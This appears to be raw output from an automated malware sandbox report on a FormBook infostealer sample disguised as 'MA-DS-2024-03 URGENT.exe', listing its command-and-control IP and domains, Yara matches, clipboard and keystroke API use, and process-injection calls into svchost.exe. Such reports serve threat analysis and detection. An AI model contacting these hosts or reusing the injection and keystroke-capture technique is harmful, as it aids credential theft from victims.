                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 17:00:35 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/usxsp
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1286891112.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/usxspa-t
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/usxsp
                Source: fbLIkXRoMf.exe, 00000012.00000002.2505900550.000000000514B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.snyp.shop
                Source: fbLIkXRoMf.exe, 00000012.00000002.2505900550.000000000514B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.snyp.shop/4nyz/
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2505224111.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d
                Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: choice.exe, 00000011.00000002.2500574105.00000000027FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: choice.exe, 00000011.00000002.2500574105.00000000027D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: choice.exe, 00000011.00000003.1970057439.000000000759F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2505224111.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://test-demo.eekxp.cn/123.html
                Source: choice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: choice.exe, 00000011.00000002.2506757530.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: choice.exe, 00000011.00000002.2505224111.0000000004EC4000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000011.00000002.2506611676.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2504606798.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2080181573.000000002CD34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
                Source: MA-DS-2024-03 URGENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000000.1251149410.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8e33dc8f-8
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000000.1251149410.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0b930c42-8
                Source: MA-DS-2024-03 URGENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cf53dd27-0
                Source: MA-DS-2024-03 URGENT.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f3dd4537-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042CBC3 NtClose,4_2_0042CBC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772B60 NtClose,LdrInitializeThunk,4_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037735C0 NtCreateMutant,LdrInitializeThunk,4_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03774340 NtSetContextThread,4_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03774650 NtSuspendThread,4_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772BF0 NtAllocateVirtualMemory,4_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772BE0 NtQueryValueKey,4_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772BA0 NtEnumerateValueKey,4_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772B80 NtQueryInformationFile,4_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772AF0 NtWriteFile,4_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772AD0 NtReadFile,4_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772AB0 NtWaitForSingleObject,4_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772F60 NtCreateProcessEx,4_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772F30 NtCreateSection,4_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772FE0 NtCreateFile,4_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772FB0 NtResumeThread,4_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772FA0 NtQuerySection,4_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772F90 NtProtectVirtualMemory,4_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772E30 NtWriteVirtualMemory,4_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772EE0 NtQueueApcThread,4_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772EA0 NtAdjustPrivilegesToken,4_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772E80 NtReadVirtualMemory,4_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772D30 NtUnmapViewOfSection,4_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772D10 NtMapViewOfSection,4_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772D00 NtSetInformationFile,4_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772DD0 NtDelayExecution,4_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772DB0 NtEnumerateKey,4_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772C60 NtCreateKey,4_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772C00 NtQueryInformationProcess,4_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772CF0 NtOpenProcess,4_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772CC0 NtQueryVirtualMemory,4_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772CA0 NtQueryInformationToken,4_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03773010 NtOpenDirectoryObject,4_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03773090 NtSetValueKey,4_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037739B0 NtGetContextThread,4_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03773D70 NtOpenThread,4_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03773D10 NtOpenProcessToken,4_2_03773D10
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
                Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8e8aaae4f259d5dc.binJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0040E6A00_2_0040E6A0
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0042D9750_2_0042D975
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0040FCE00_2_0040FCE0
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004221C50_2_004221C5
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004362D20_2_004362D2
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004803DA0_2_004803DA
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0043242E0_2_0043242E
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004225FA0_2_004225FA
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0045E6160_2_0045E616
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004166E10_2_004166E1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0043878F0_2_0043878F
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004368440_2_00436844
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004808570_2_00480857
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004188080_2_00418808
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004688890_2_00468889
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0042CB210_2_0042CB21
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00436DB60_2_00436DB6
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00416F9E0_2_00416F9E
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004130300_2_00413030
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0042F1D90_2_0042F1D9
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004231870_2_00423187
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004012870_2_00401287
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004214840_2_00421484
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004155200_2_00415520
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004276960_2_00427696
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004157600_2_00415760
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004219780_2_00421978
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00439AB50_2_00439AB5
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0051FCC80_2_0051FCC8
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00487DDB0_2_00487DDB
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00421D900_2_00421D90
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0042BDA60_2_0042BDA6
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0040DF000_2_0040DF00
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00413FE00_2_00413FE0
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00B665E80_2_00B665E8
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016751EE0_2_016751EE
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01676EAF0_2_01676EAF
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016B00D90_2_016B00D9
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016AD5800_2_016AD580
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016AC7F00_2_016AC7F0
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016A37800_2_016A3780
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016B39A30_2_016B39A3
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016A59800_2_016A5980
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01677B710_2_01677B71
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01677F800_2_01677F80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00418BA34_2_00418BA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E8554_2_0040E855
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004010C84_2_004010C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004010D04_2_004010D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042F1D34_2_0042F1D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004029F84_2_004029F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402A004_2_00402A00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004032D04_2_004032D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041040A4_2_0041040A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004104134_2_00410413
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004015004_2_00401500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00416DA34_2_00416DA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E6434_2_0040E643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004106334_2_00410633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004026F04_2_004026F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E7884_2_0040E788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E7934_2_0040E793
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FA3524_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_038003E64_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E3F04_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E02744_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C02C04_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C81584_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_038001AA4_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DA1184_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037301004_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F81CC4_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F41A24_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D20004_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037407704_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037647504_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373C7C04_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375C6E04_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_038005914_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037405354_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F24464_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E44204_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EE4F64_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FAB404_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F6BD74_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373EA804_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037569624_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0380A9A64_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037429A04_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374A8404_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037428404_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E8F04_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037268B84_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B4F404_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03760F304_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E2F304_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03782F284_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374CFE04_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03732FC84_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BEFA04_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740E594_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FEE264_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FEEDB4_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03752E904_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FCE934_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DCD1F4_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374AD004_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373ADE04_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03758DBF4_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740C004_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730CF24_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0CB54_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372D34C4_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F132D4_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0378739A4_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E12ED4_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375B2C04_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037452A04_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372F1724_2_0372F172
